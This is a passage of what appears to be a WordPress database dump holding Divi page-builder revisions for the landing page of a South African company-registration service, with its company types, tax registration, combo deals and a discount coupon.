button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\" custom_margin=\"6px||6px||false|false\" custom_padding=\"0px||0px||false|false\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Product page\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.11)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"73%\" background_color_gradient_end_position=\"99%\" box_shadow_style=\"preset2\" custom_padding=\"6px|0px|22px|0px|false|false\"][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"30px|0px|14px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.2.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"color: #0c71c3; font-family: inherit; font-weight: normal;\"><strong>Most Popular<br /></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\">Customise your requirement and SAVE</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_3,1_3\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"3px\" border_color_all=\"#ffffff\" border_style_all=\"none\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"||20px|\" custom_padding=\"20px|20px||20px\" make_fullwidth=\"on\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_shop type=\"best_selling\" posts_number=\"9\" columns_number=\"3\" orderby=\"popularity\" sale_badge_color=\"rgba(255,35,83,0.69)\" icon_hover_color=\"#2fa318\" hover_overlay_color=\"rgba(124,218,36,0.23)\" hover_icon=\"%%45%%\" admin_label=\"Featured page\" _builder_version=\"3.26.6\" title_font=\"|700|||||||\" title_font_size=\"18px\" title_line_height=\"1.1em\" price_font=\"Open Sans|600|on||||||\" price_text_color=\"#0c71c3\" price_font_size=\"18px\" price_text_shadow_style=\"preset4\" custom_padding=\"20px|||10px\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.23.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" url_new_window=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2019/07/Money-Back-Guarantee.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.26.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_translate=\"84px|-67px\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-08 15:19:46','2019-08-08 13:19:46','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32424,3,'2019-08-08 15:19:18','2019-08-08 13:19:18','[et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.22.3\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"29px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong>Select the company you require below or refer to menu above</strong></span><span style=\"font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\"><br /> </span></strong></span></h1>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" _builder_version=\"3.26.6\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" custom_margin=\"|||\" custom_padding=\"0|15px|0px|14px|false|false\"][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background__hover_enabled=\"on\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\"][et_pb_cta title=\"Private Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"||0px|||\" custom_padding=\"10px|5px|51px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#0c71c3\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" custom_margin=\"6px||6px||false|false\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\" custom_padding=\"0px||0px||false|false\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#0c71c3\" header_text_color__hover_enabled=\"on\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" custom_margin=\"6px||6px||false|false\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\" custom_padding=\"0px||0px||false|false\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#0c71c3\" header_text_color__hover_enabled=\"on\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\" custom_margin=\"6px||6px||false|false\" custom_padding=\"0px||0px||false|false\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Product page\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.11)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"73%\" background_color_gradient_end_position=\"99%\" box_shadow_style=\"preset2\" custom_padding=\"6px|0px|22px|0px|false|false\"][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"30px|0px|14px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.2.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"color: #0c71c3; font-family: inherit; font-weight: normal;\"><strong>Most Popular<br /></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\">Customise your requirement and SAVE</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_3,1_3\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"3px\" border_color_all=\"#ffffff\" border_style_all=\"none\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"||20px|\" custom_padding=\"20px|20px||20px\" make_fullwidth=\"on\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_shop type=\"best_selling\" posts_number=\"9\" columns_number=\"3\" orderby=\"popularity\" sale_badge_color=\"rgba(255,35,83,0.69)\" icon_hover_color=\"#2fa318\" hover_overlay_color=\"rgba(124,218,36,0.23)\" hover_icon=\"%%45%%\" admin_label=\"Featured page\" _builder_version=\"3.26.6\" title_font=\"|700|||||||\" title_font_size=\"18px\" title_line_height=\"1.1em\" price_font=\"Open Sans|600|on||||||\" price_text_color=\"#0c71c3\" price_font_size=\"18px\" price_text_shadow_style=\"preset4\" custom_padding=\"20px|||10px\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Save\" 